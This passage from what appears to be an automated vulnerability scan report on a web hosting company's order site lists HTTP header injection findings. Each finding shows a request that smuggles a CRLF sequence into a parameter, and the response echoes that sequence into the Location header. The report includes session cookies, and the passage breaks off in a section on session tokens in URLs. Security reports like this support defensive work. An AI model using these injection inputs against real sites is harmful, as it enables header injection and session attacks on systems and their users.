Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:58 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=a5802
86591ee57c3
&linkId=hd.log.eue&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Gdms7Pj81Xl5eWGthaC5mYC0fKWJVTydVSEIqLisrKigqKCUlKCchJCgbHRwbGFRCbmNlcystKFgxW2owIyQgHyQgHiEfMDgvLjdvcDYrMmJrMSQlISAlIh8iHSA4MTI=; Expires=Fri, 07-Apr-2079 21:37:05 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.4. http://order.1and1.com/xml/order/Jumpto [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b9161%0d%0a0390bad3044 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue&b9161%0d%0a0390bad3044=1 HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:58 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_top&b9161
0390bad3044
=1
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=vZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:37:05 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.5. http://order.1and1.com/xml/order/Jumpto [origin.page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the origin.page request parameter is copied into the Location response header. The payload 2e03b%0d%0ad348ca74978 was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=2e03b%0d%0ad348ca74978&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:58 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=2e03b
d348ca74978
&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:37:05 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.6. http://order.1and1.com/xml/order/Jumpto [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the page request parameter is copied into the Location response header. The payload d57be%0d%0aa073224f42f was submitted in the page parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=ngh&site=PU.NGH.US&origin.page=Hosting&page=d57be%0d%0aa073224f42f&linkOrigin=Hosting&linkId=ngh HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:23:04 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.NGH.US&target.page=d57be
a073224f42f
&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.NGH.US&linkOrigin=Hosting&linkId=ngh&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ra2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:37:11 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.7. http://order.1and1.com/xml/order/Jumpto [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 6bf4e%0d%0a357848c4060 was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=6bf4e%0d%0a357848c4060&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:57 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=6bf4e
357848c4060
&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=6bf4e
357848c4060&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=wZlsrLi8lTmVlX3JobzVtZzQmMGlcVi5FODIaHhsbMS8xLywsLy4oKy8iJCMiH0QyXlNVYxs0L184YnE3KisnJisnJSgmICgfHidfYD0yOWlyOCssKCcsKSYpJCcoISI=; Expires=Fri, 07-Apr-2079 21:37:04 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.8. http://order.1and1.com/xml/order/Jumpto [sourcearea parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the sourcearea request parameter is copied into the Location response header. The payload 29bf0%0d%0ad43926d593f was submitted in the sourcearea parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&origin.page=Hosting&linkId=weiter&site=PU.NGH.US&page=switch&sourcearea=29bf0%0d%0ad43926d593f HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:23:11 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.NGH.US&target.page=switch&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.NGH.US&linkId=weiter&__frame=_top&sourcearea=29bf0
d43926d593f

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=uaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:37:18 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.9. http://order.1and1.com/xml/order/domaincheck [__lf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The value of the __lf request parameter is copied into the Location response header. The payload ab024%0d%0acfe55b3b16 was submitted in the __lf parameter. This caused a response containing an injected HTTP header.

Request

POST /xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame= HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
Origin: http://order.1and1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
Content-Length: 161

__lf=ab024%0d%0acfe55b3b16&__sendingdata=1&__SBMT%3Ad1e1995d1%3A=&__SYNT%3Ad1e1995d1%3Anodomain.clicked=true&__SYNT%3Ad1e1995d1%3A__CMD%5Bdomaincheck%5D%3ASELWRP=nodomain

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:36 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300646916771&__frame=&__lf=ab024
cfe55b3b16

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=FYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyAjHiEiMjM=; Expires=Fri, 07-Apr-2079 22:02:43 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 0


2.10. http://order.1and1.com/xml/order/domaincheck [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload e4fdd%0d%0a682e1dc8167 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

POST /xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=e4fdd%0d%0a682e1dc8167 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
Origin: http://order.1and1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
Content-Length: 161

__lf=Order-Tariff&__sendingdata=1&__SBMT%3Ad1e1995d1%3A=&__SYNT%3Ad1e1995d1%3Anodomain.clicked=true&__SYNT%3Ad1e1995d1%3A__CMD%5Bdomaincheck%5D%3ASELWRP=nodomain

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:35 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300646915507&__frame=e4fdd
682e1dc8167
&__lf=Order-Tariff
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=mcGU1ODkvWFhYUmVbYihgWicwOnNmYDhPQjwkKCUlJCIkIh8fIiEbHjksLi0sKU48aF1fbSUnIlIrVWQqHR4aMDUxLzIwKjIpKDFpajAlLFxlKx4fGxo2MzAzLjEyKyw=; Expires=Fri, 07-Apr-2079 22:02:42 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 0


2.11. http://order.1and1.com/xml/order/tariffselect [__lf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/tariffselect

Issue detail

The value of the __lf request parameter is copied into the Location response header. The payload 70f82%0d%0ae7e5d5b7eec was submitted in the __lf parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=70f82%0d%0ae7e5d5b7eec&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-beginner-package-bundle HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:39:48 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300646388883&__frame=_top&__lf=70f82
e7e5d5b7eec

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=mcGU1ODkvWFhYUmVbYihgWicwOnNmYDhPQjwkKCUlJCIkIh8fIiEbHjksLi0sKU48aF1fbSUnIlIrVWQqHR4aMDUxLzIwKjIpKDFpajAlLFxlKx4fGxo2MzAzLjEyKyw=; Expires=Fri, 07-Apr-2079 21:53:55 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 0


2.12. http://order.1and1.com/xml/order/tariffselect [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/tariffselect

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload 1fd04%0d%0a0cd46c6d446 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top1fd04%0d%0a0cd46c6d446&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-home-package-bundle HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:39:12 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300646352788&__frame=_top1fd04
0cd46c6d446

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; Expires=Fri, 07-Apr-2079 21:53:19 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


3. Session token in URL

There are 120 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


3.1. http://order.1and1.com/links

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /links

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /links;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
